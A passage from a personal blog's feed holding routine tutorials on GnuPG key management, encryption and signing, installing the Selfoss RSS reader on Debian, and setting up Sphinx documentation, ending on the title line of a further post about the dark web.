class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">/home/zero/.gnupg/pubring.gpg</span><br><span class="line">-----------------------------</span><br><span class="line">pub 2048R/675394C8 2016-07-16</span><br><span class="line">uid Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 2048R/D2951F3C 2016-07-16</span><br><span class="line"></span><br><span class="line">pub 2048R/4D67E763 2016-07-16</span><br><span class="line">uid Test User2 <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 2048R/D2C6D99E 2016-07-16</span><br></pre></td></tr></table></figure><p>Delete a public key from the keyring</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --delete-key 675394C8</span><br></pre></td></tr></table></figure><p>Delete a private key from the keyring</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --delete-secret-keys 675394C8</span><br></pre></td></tr></table></figure><p>Delete both the private and the public key of a key pair from the keyring</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --delete-secret-and-public-keys 675394C8</span><br></pre></td></tr></table></figure><h3 id="2-3、导出密钥"><a href="#2-3、导出密钥" class="headerlink" title="2.3、导出密钥"></a>2.3 Exporting keys</h3><p>The public keyring is stored in binary form in ~/.gnupg/pubring.gpg; the <code>--armor</code> option converts the output to ASCII.</p><p>Export a public key to a file</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --armor --output public-key.asc --<span class="built_in">export</span> 
675394C8</span><br></pre></td></tr></table></figure><p><code>--export</code> selects which public key to export, and <code>--output</code> sets the output file name, here <code>public-key.asc</code>.</p><p>Export a private key to a file</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --armor --output private-key.asc --<span class="built_in">export</span>-secret-keys 675394C8</span><br></pre></td></tr></table></figure><p><code>--export-secret-keys</code> selects which private key to export, and <code>--output</code> sets the output file name, here <code>private-key.asc</code>.</p><p>Export a revocation certificate</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --output revoke-key.asc --gen-revoke 675394C8</span><br></pre></td></tr></table></figure><p>The revocation certificate is kept in reserve: if the key is ever invalidated, you can use it to ask external public key servers to revoke your public key.</p><h3 id="2-4、上传公钥"><a href="#2-4、上传公钥" class="headerlink" title="2.4、上传公钥"></a>2.4 Uploading the public key</h3><p>You can publish the public key on your own website for others to fetch, or upload it to one of the servers on the Internet dedicated to storing users' public keys.</p><p>Upload the public key to the <code>subkeys.pgp.net</code> server</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --keyserver hkp://subkeys.pgp.net --send-keys 675394C8</span><br></pre></td></tr></table></figure><p>Generate the public key fingerprint</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --fingerprint 675394C8</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">pub 2048R/675394C8 2016-07-16</span><br><span class="line"> Key fingerprint = 86AB 2D80 CEED 59DC F046 F75C D027 CF07 6753 94C8</span><br><span class="line">uid Test User <<span 
class="built_in">test</span>@example.com></span><br><span class="line">sub 2048R/D2951F3C 2016-07-16</span><br></pre></td></tr></table></figure><p>Key servers have no verification mechanism, so anyone can upload a public key in your name, and there is no way to guarantee that a public key found on a server is trustworthy.<br>The usual practice is to publish the key fingerprint on your website so that others can check whether the public key they downloaded is genuine.</p><h3 id="2-5、倒入密钥"><a href="#2-5、倒入密钥" class="headerlink" title="2.5、倒入密钥"></a>2.5 Importing keys</h3><p>Import a key file</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --import public-key.asc</span><br></pre></td></tr></table></figure><p>Import a public key from the default key server <code>keys.gnupg.net</code></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --recv-keys 675394C8</span><br></pre></td></tr></table></figure><p>Import a key from a key server and verify its fingerprint</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gpg --keyserver hkp://subkeys.pgp.net --search-keys 675394C8</span><br><span class="line">gpg --fingerprint 675394C8</span><br></pre></td></tr></table></figure><h2 id="3、加密和解密"><a href="#3、加密和解密" class="headerlink" title="3、加密和解密"></a>3. Encryption and decryption</h2><p>The example file is <code>msg.txt</code>, with the content <code>Hello World</code>.</p><h3 id="3-1、对称加密"><a href="#3-1、对称加密" class="headerlink" title="3.1、对称加密"></a>3.1 Symmetric encryption</h3><p>Symmetric encryption does not need a key pair; it is similar to ordinary password-based encryption.</p><p>Encrypt a file</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -c msg.txt</span><br></pre></td></tr></table></figure><p>After you type the passphrase twice, an encrypted file with the <code>.gpg</code> extension is created.</p><p>Decrypt a file</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg msg.txt.gpg</span><br></pre></td></tr></table></figure><p>Use the <code>-o</code> option to set the name of the decrypted output file and <code>-d</code> 
 to specify the file to decrypt.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -o hello.txt -d msg.txt.gpg</span><br></pre></td></tr></table></figure><h3 id="3-2、公钥加密"><a href="#3-2、公钥加密" class="headerlink" title="3.2、公钥加密"></a>3.2 Public-key encryption</h3><p>Encrypt a file</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --recipient 675394C8 --output msg-encrypt.txt.gpg --encrypt msg.txt</span><br></pre></td></tr></table></figure><p>Shorthand command</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -ea -r test@example.com msg.txt</span><br></pre></td></tr></table></figure><p><code>-e</code> is <code>--encrypt</code> and encrypts the data; <code>-a</code> is <code>--armor</code> and produces ASCII output (without it the output is a binary file ending in <code>.gpg</code>); <code>-r</code> is <code>--recipient</code> and names the user ID to encrypt for, given either as the hash value or as the e-mail address.</p><p>Decrypt a file</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --output msg_1.txt --decrypt msg-encrypt.txt.gpg</span><br></pre></td></tr></table></figure><p>Shorthand command</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg msg.txt.asc</span><br></pre></td></tr></table></figure><h2 id="4、签名和验证"><a href="#4、签名和验证" class="headerlink" title="4、签名和验证"></a>4. Signing and verification</h2><h3 id="4-1、数字签名"><a href="#4-1、数字签名" class="headerlink" title="4.1、数字签名"></a>4.1 Digital signature</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -o msg.txt.sig -s msg.txt</span><br></pre></td></tr></table></figure><p><code>-o</code> is <code>--output</code> 
and names the file to write to; <code>-s</code> is <code>--sign</code> and names the file to sign.</p><h3 id="4-2、文本签名"><a href="#4-2、文本签名" class="headerlink" title="4.2、文本签名"></a>4.2 Clear-text signature</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -o msg.txt.sig --clearsign msg.txt</span><br></pre></td></tr></table></figure><h3 id="4-3、分离式签名"><a href="#4-3、分离式签名" class="headerlink" title="4.3、分离式签名"></a>4.3 Detached signature</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -o msg.txt.sig -ab msg.txt</span><br></pre></td></tr></table></figure><p><code>msg.txt.sig</code> contains only the signature; a detached signature means the original file and the signature are kept separate. <code>-a</code> is <code>--armor</code> and produces ASCII output; <code>-b</code> is <code>--detach-sign</code> and creates a detached signature.</p><h3 id="4-4、签名和加密"><a href="#4-4、签名和加密" class="headerlink" title="4.4、签名和加密"></a>4.4 Signing and encrypting</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --<span class="built_in">local</span>-user 675394C8 --recipient 4D67E763 --armor --sign --encrypt msg.txt</span><br></pre></td></tr></table></figure><p><code>--local-user</code> is the sender's ID, that is, the ID of your own private key used for signing; <code>--recipient</code> is the ID of the recipient's public key.</p><h3 id="4-5、验证签名"><a href="#4-5、验证签名" class="headerlink" title="4.5、验证签名"></a>4.5 Verifying a signature</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --verify msg.txt.sig</span><br></pre></td></tr></table></figure><hr><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h3><ul><li><a href="https://www.gnupg.org/gph/en/manual.html" target="_blank" rel="noopener">The GNU Privacy Handbook</a></li><li><a href="http://wiki.ubuntu.org.cn/GPG/PGP" target="_blank" rel="noopener">GPG/PGP - Ubuntu中文</a></li><li><a 
href="http://www.ruanyifeng.com/blog/2013/07/gpg.html" target="_blank" rel="noopener">GPG入门教程</a></li></ul>]]></content>
<summary type="html">
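<p>GnuPG (GNU Privacy Guard, GPG) is encryption software: a GPL-licensed replacement for the PGP encryption software. GnuPG is designed according to the OpenPGP standard defined by the IETF. It is used for encryption, digital signatures and generating asymmetric key pairs. GPG is compatible with the functionality of PGP (Pretty Good Privacy).<br>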
</summary>
<category term="GPG" scheme="https://blog.iternull.com/tags/GPG/"/>
</entry>
<entry>
<title>Installing Selfoss on Debian</title>
<link href="https://blog.iternull.com/posts/2016/02/13/How-to-Install-Selfoss-of-Debian.html"/>
<id>https://blog.iternull.com/posts/2016/02/13/How-to-Install-Selfoss-of-Debian.html</id>
<published>2016-02-13T15:42:49.000Z</published>
<updated>2016-08-19T09:53:37.000Z</updated>
<content type="html"><![CDATA[<p><a href="http://selfoss.aditu.de/" target="_blank" rel="noopener">Selfoss</a> is an open-source, web-based RSS reader. You host the server side yourself; clients are available for the web, <a href="https://play.google.com/store/apps/details?id=fr.ydelouis.selfoss" target="_blank" rel="noopener">Android</a> and <a href="https://itunes.apple.com/us/app/cataracta/id817392033" target="_blank" rel="noopener">iOS</a>.<br><a id="more"></a></p><h2 id="安装-Web-服务端程序"><a href="#安装-Web-服务端程序" class="headerlink" title="安装 Web 服务端程序"></a>Installing the web server software</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install apache2 libapache2-mod-php5 php5 php5-cgi php5-cli php5-fpm php5-gd php5-json php5-mysql php5-sqlite mysql-server mysql-client</span><br></pre></td></tr></table></figure><p>While installing MySQL, Debian asks you to set the MySQL root password.</p><h2 id="配置-Apache"><a href="#配置-Apache" class="headerlink" title="配置 Apache"></a>Configuring Apache</h2><p>Edit the configuration file, find the section that configures the website root directory, and change the <code>AllowOverride</code> option from <code>None</code> to <code>All</code>. The resulting configuration is:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/apache2/apache2.conf</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><Directory /var/www/></span><br><span class="line"> Options Indexes FollowSymLinks</span><br><span class="line"> <span class="comment">#AllowOverride None</span></span><br><span class="line"> AllowOverride All</span><br><span class="line"> Require all granted</span><br><span class="line"></Directory></span><br></pre></td></tr></table></figure><h2 id="启用模块"><a href="#启用模块" 
class="headerlink" title="启用模块"></a>Enabling modules</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">a2enmod rewrite</span><br><span class="line">a2enmod headers</span><br></pre></td></tr></table></figure><h2 id="配置-MySQL"><a href="#配置-MySQL" class="headerlink" title="配置 MySQL"></a>Configuring MySQL</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">service mysql start</span><br><span class="line">mysql -u root -p</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">CREATE DATABASE selfoss; -- the database is named selfoss</span><br><span class="line">CREATE USER <span class="string">'selfoss'</span>@<span class="string">'localhost'</span> IDENTIFIED BY <span class="string">'password'</span>; -- user selfoss, local connections only; the password here is 'password'</span><br><span class="line">GRANT ALL PRIVILEGES ON selfoss.* TO <span class="string">'selfoss'</span>@<span class="string">'localhost'</span> IDENTIFIED BY <span class="string">'password'</span>; -- allow the selfoss user to work on the selfoss database</span><br></pre></td></tr></table></figure><h2 id="安装-Selfoss"><a href="#安装-Selfoss" class="headerlink" title="安装 Selfoss"></a>Installing Selfoss</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /var/www/html</span><br><span class="line">wget https://github.com/ZMOM1031/selfoss/releases/download/2.14-1/selfoss-2.14-1.zip</span><br><span class="line">unzip selfoss-2.14-1.zip</span><br><span 
class="line">rm -rf selfoss-2.14-1.zip</span><br><span class="line">chown -R www-data:www-data ./</span><br><span class="line">vim config.ini</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">; see http://selfoss.aditu.de <span class="keyword">for</span> more information about</span><br><span class="line">; the configuration parameters</span><br><span class="line">[globals]</span><br><span class="line">db_type=mysql</span><br><span class="line">db_database=selfoss</span><br><span class="line">db_username=selfoss</span><br><span class="line">db_password=password</span><br><span class="line">db_port=3306</span><br><span class="line">username=admin // optional</span><br><span class="line">password= // optional; the value here is a <span class="built_in">hash</span>, which you can generate on the http://yourwebsite.com/password page after installation</span><br></pre></td></tr></table></figure><h2 id="启动-Web-服务"><a href="#启动-Web-服务" class="headerlink" title="启动 Web 服务"></a>Starting the web service</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">service apache2 start</span><br></pre></td></tr></table></figure><h2 id="配置-cron-自动更新内容"><a href="#配置-cron-自动更新内容" class="headerlink" title="配置 cron 自动更新内容"></a>Configuring cron to update content automatically</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">crontab -e</span><br><span class="line">0 * * * * /usr/bin/php 
/var/www/vhosts/reader.iternull.com/cliupdate.php</span><br></pre></td></tr></table></figure><h2 id="RSS-链接"><a href="#RSS-链接" class="headerlink" title="RSS 链接"></a>RSS links</h2><p>What is an RSS feed address? How do you add one? How do you subscribe?<br>Feed addresses come in several forms; the common ones are listed below. To find a site's feed, look on its home page for an RSS-style icon. Some sites have turned RSS off or never configured it.<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">http://www.example.com/atom.xml</span><br><span class="line">http://www.example.com/rss</span><br><span class="line">http://www.example.com/feed</span><br><span class="line">http://www.example.com/feed/</span><br><span class="line">http://www.example.com/?feed=rss2</span><br><span class="line">......</span><br></pre></td></tr></table></figure></p>]]></content>
<summary type="html">
<p><a href="http://selfoss.aditu.de/" target="_blank" rel="noopener">Selfoss</a> is an open-source, web-based RSS reader. You host the server side yourself; clients are available for the web, <a href="https://play.google.com/store/apps/details?id=fr.ydelouis.selfoss" target="_blank" rel="noopener">Android</a> and <a href="https://itunes.apple.com/us/app/cataracta/id817392033" target="_blank" rel="noopener">iOS</a>.<br>
</summary>
<category term="Linux" scheme="https://blog.iternull.com/tags/Linux/"/>
<category term="Selfoss" scheme="https://blog.iternull.com/tags/Selfoss/"/>
</entry>
<entry>
<title>Installing and Using Sphinx</title>
<link href="https://blog.iternull.com/posts/2016/01/11/Sphinx-Installation-and-use.html"/>
<id>https://blog.iternull.com/posts/2016/01/11/Sphinx-Installation-and-use.html</id>
<published>2016-01-11T14:13:53.000Z</published>
<updated>2016-08-19T12:11:46.000Z</updated>
<content type="html"><![CDATA[<p><a href="http://www.sphinx-doc.org/" target="_blank" rel="noopener">Sphinx</a> is a documentation generator written in Python. Documents are written in <a href="http://docutils.sourceforge.net/rst.html" target="_blank" rel="noopener">reStructuredText</a> syntax and built into HTML pages, PDF files or other formats.<br><a id="more"></a></p><h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>Installation</h2><p>Before installing Sphinx, make sure <code>Python</code> and <code>pip</code> are already installed.<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip install sphinx</span><br></pre></td></tr></table></figure></p><h2 id="创建一个文档项目"><a href="#创建一个文档项目" class="headerlink" title="创建一个文档项目"></a>Creating a documentation project</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sphinx-quickstart</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span 
class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span 
class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line">root@null:~/Codes/Docs/Selfoss# sphinx-quickstart</span><br><span class="line">Welcome to the Sphinx 1.3.3 quickstart utility.</span><br><span class="line"></span><br><span class="line">Please enter values for the following settings (just press Enter to</span><br><span class="line">accept a default value, if one is given in brackets).</span><br><span class="line"></span><br><span class="line">Enter the root path for documentation.</span><br><span class="line">> Root path for the documentation [.]:</span><br><span class="line">// Enter the documentation root path</span><br><span class="line">// Root path for the documentation [.]:</span><br><span class="line">// The default needs no change; just press Enter</span><br><span class="line"></span><br><span class="line">You have two options for placing the build directory for Sphinx output.</span><br><span class="line">Either, you use a directory "_build" within the root path, or you separate</span><br><span class="line">"source" and "build" directories within the root path.</span><br><span class="line">> Separate source and build directories (y/n) [n]: y</span><br><span class="line">// Separate source and build directories (y/n) [n]:</span><br><span class="line">// Keeping the documentation sources apart from the build output is recommended; type y and press Enter</span><br><span class="line"></span><br><span class="line">Inside the root directory, two more directories will be created; "_templates"</span><br><span class="line">for custom HTML templates and "_static" for custom stylesheets and other static</span><br><span class="line">files. 
You can enter another prefix (such as ".") to replace the underscore.</span><br><span class="line">> Name prefix for templates and static dir [_]:</span><br><span class="line">// Name prefix for the templates and static directories [_]:</span><br><span class="line">// Use the default "_"; just press Enter</span><br><span class="line"></span><br><span class="line">The project name will occur in several places in the built documentation.</span><br><span class="line">> Project name: Selfoss</span><br><span class="line">// Project name</span><br><span class="line">> Author name(s): ZMOM1031</span><br><span class="line">// Author name</span><br><span class="line"></span><br><span class="line">Sphinx has the notion of a "version" and a "release" for the</span><br><span class="line">software. Each version can have multiple releases. For example, for</span><br><span class="line">Python the version is something like 2.5 or 3.0, while the release is</span><br><span class="line">something like 2.5.1 or 3.0a1. If you don't need this dual structure,</span><br><span class="line">just set both to the same value.</span><br><span class="line">> Project version: 1.0.0</span><br><span class="line">// Project version number</span><br><span class="line">> Project release [1.0.0]:</span><br><span class="line">// Project release number</span><br><span class="line"></span><br><span class="line">If the documents are to be written in a language other than English,</span><br><span class="line">you can select a language here by its language code. Sphinx will then</span><br><span class="line">translate text that it generates into that language.</span><br><span class="line"></span><br><span class="line">For a list of supported codes, see</span><br><span class="line">http://sphinx-doc.org/config.html#confval-language.</span><br><span class="line">> Project language [en]: zh_CN</span><br><span class="line">// Language used by the project</span><br><span class="line"></span><br><span class="line">The file name suffix for source files. Commonly, this is either ".txt"</span><br><span class="line">or ".rst". 
Only files with this suffix are considered documents.</span><br><span class="line">> Source file suffix [.rst]:</span><br><span class="line">// Suffix of the documentation source files</span><br><span class="line"></span><br><span class="line">One document is special in that it is considered the top node of the</span><br><span class="line">"contents tree", that is, it is the root of the hierarchical structure</span><br><span class="line">of the documents. Normally, this is "index", but if your "index"</span><br><span class="line">document is a custom template, you can also set this to another filename.</span><br><span class="line">> Name of your master document (without suffix) [index]:</span><br><span class="line"></span><br><span class="line">Sphinx can also add configuration for epub output:</span><br><span class="line">> Do you want to use the epub builder (y/n) [n]:</span><br><span class="line">// Whether to use the epub e-book builder</span><br><span class="line"></span><br><span class="line">Please indicate if you want to use one of the following Sphinx extensions:</span><br><span class="line">> autodoc: automatically insert docstrings from modules (y/n) [n]:</span><br><span class="line">> doctest: automatically test code snippets in doctest blocks (y/n) [n]:</span><br><span class="line">> intersphinx: link between Sphinx documentation of different projects (y/n) [n]:</span><br><span class="line">> todo: write "todo" entries that can be shown or hidden on build (y/n) [n]:</span><br><span class="line">> coverage: checks for documentation coverage (y/n) [n]:</span><br><span class="line">> pngmath: include math, rendered as PNG images (y/n) [n]:</span><br><span class="line">> mathjax: include math, rendered in the browser by MathJax (y/n) [n]:</span><br><span class="line">> ifconfig: conditional inclusion of content based on config values (y/n) [n]:</span><br><span class="line">> viewcode: include links to the source code of documented Python objects (y/n) [n]:</span><br><span class="line"></span><br><span 
class="line">A Makefile and a Windows command file can be generated for you so that you</span><br><span class="line">only have to run e.g. `make html' instead of invoking sphinx-build</span><br><span class="line">directly.</span><br><span class="line">> Create Makefile? (y/n) [y]:</span><br><span class="line">> Create Windows command file? (y/n) [y]:</span><br><span class="line"></span><br><span class="line">Creating file ./source/conf.py.</span><br><span class="line">Creating file ./source/index.rst.</span><br><span class="line">Creating file ./Makefile.</span><br><span class="line">Creating file ./make.bat.</span><br><span class="line"></span><br><span class="line">Finished: An initial directory structure has been created.</span><br><span class="line"></span><br><span class="line">You should now populate your master file ./source/index.rst and create other documentation</span><br><span class="line">source files. Use the Makefile to build the docs, like so:</span><br><span class="line"> make builder</span><br><span class="line">where "builder" is one of the supported builders, e.g. 
html, latex or linkcheck.</span><br></pre></td></tr></table></figure><p>Initializing a project creates the following files in the current directory:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">.</span><br><span class="line">├── build // Build output directory</span><br><span class="line">├── make.bat // make script for Windows</span><br><span class="line">├── Makefile // Defines the build rules</span><br><span class="line">└── source // Directory holding the documentation sources</span><br><span class="line"> ├── conf.py // Project configuration file</span><br><span class="line"> ├── index.rst // Source of the documentation home page</span><br><span class="line"> ├── _static // Static files directory?</span><br><span class="line"> └── _templates // Templates directory</span><br></pre></td></tr></table></figure><h2 id="编写文档"><a href="#编写文档" class="headerlink" title="编写文档"></a>Writing documentation</h2><p>Write documents in <code>reStructuredText</code> syntax and save them in the <code>source</code> directory with the <code>.rst</code> file suffix.</p><h2 id="编译文档"><a href="#编译文档" class="headerlink" title="编译文档"></a>Building the documentation</h2><p>Build the HTML pages:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">make html</span><br></pre></td></tr></table></figure></p><p>Besides HTML, <code>make</code> can also build other output formats.</p><h2 id="修改主题"><a href="#修改主题" class="headerlink" title="修改主题"></a>Changing the theme</h2><p>The theme here means the style of the generated HTML pages. Sphinx ships several official <a href="http://www.sphinx-doc.org/en/stable/theming.html" target="_blank" rel="noopener">themes</a>; this post uses the <a href="https://readthedocs.org/" target="_blank" rel="noopener">Read The Docs</a> theme.</p><p>Install the theme:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip install sphinx_rtd_theme</span><br></pre></td></tr></table></figure></p><p>Edit the configuration file:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim <span class="built_in">source</span>/conf.py</span><br></pre></td></tr></table></figure></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">import sphinx_rtd_theme</span><br><span class="line"></span><br><span class="line">html_theme = "sphinx_rtd_theme"</span><br><span class="line"></span><br><span class="line">html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]</span><br></pre></td></tr></table></figure><p>Other themes are configured slightly differently; follow each theme's official configuration instructions.</p><hr><ul><li>Sphinx documentation (Chinese): <a href="https://sphinx-doc-zh.readthedocs.org/" target="_blank" rel="noopener">https://sphinx-doc-zh.readthedocs.org/</a></li><li>Sphinx documentation (Chinese): <a href="https://zh-sphinx-doc.readthedocs.org/" target="_blank" rel="noopener">https://zh-sphinx-doc.readthedocs.org/</a></li><li>reStructuredText documentation (Chinese): <a href="http://sphinx-doc-zh.readthedocs.org/" target="_blank" rel="noopener">http://sphinx-doc-zh.readthedocs.org/</a></li><li>reStructuredText online editor: <a href="http://rst.ninjs.org/" target="_blank" rel="noopener">http://rst.ninjs.org/</a></li><li>Read The Docs documentation hosting: <a href="https://readthedocs.org/" target="_blank" rel="noopener">https://readthedocs.org/</a></li></ul>]]></content>
<summary type="html">
<p><a href="http://www.sphinx-doc.org/" target="_blank" rel="noopener">Sphinx</a> is a documentation authoring and generation tool written in Python. Documents are written in <a href="http://docutils.sourceforge.net/rst.html" target="_blank" rel="noopener">reStructuredText</a> syntax and built into HTML pages, PDF files or other formats.<br>
</summary>
<category term="Sphinx" scheme="https://blog.iternull.com/tags/Sphinx/"/>
</entry>
<entry>
<title>How to Access the Dark Web</title>
<link href="https://blog.iternull.com/posts/2016/01/06/How-to-Access-the-Dark-Web.html"/>
<id>https://blog.iternull.com/posts/2016/01/06/How-to-Access-the-Dark-Web.html</id>
<published>2016-01-06T14:52:27.000Z</published>
<updated>2017-02-11T05:59:10.070Z</updated>
